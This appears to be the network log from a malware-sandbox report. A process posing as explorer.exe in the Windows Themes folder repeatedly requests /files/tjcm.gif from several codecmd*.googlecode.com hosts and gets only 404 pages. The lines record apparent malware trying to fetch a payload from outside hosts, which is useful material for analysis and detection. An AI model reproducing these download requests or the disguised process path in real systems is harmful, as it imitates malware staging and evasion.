Sep 2, 2024 14:24:46.502655983 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:47.183583975 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:47 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:47.183607101 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49738	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:48.318089962 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:49.040725946 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:48 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:49.040757895 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49740	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:49.901312113 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:50.615811110 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:50 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:50.615828037 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49741	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:51.389072895 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:52.075927973 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:51 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:52.075952053 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49742	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:52.764425993 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:53.449453115 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:53 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:53.449477911 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49743	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:54.185820103 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:55.017236948 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:54 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:55.017263889 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Sep 2, 2024 14:24:55.017275095 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49744	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:55.787950039 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:24:56.486880064 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:24:56 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:24:56.486901045 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49745	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:24:57.099468946 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
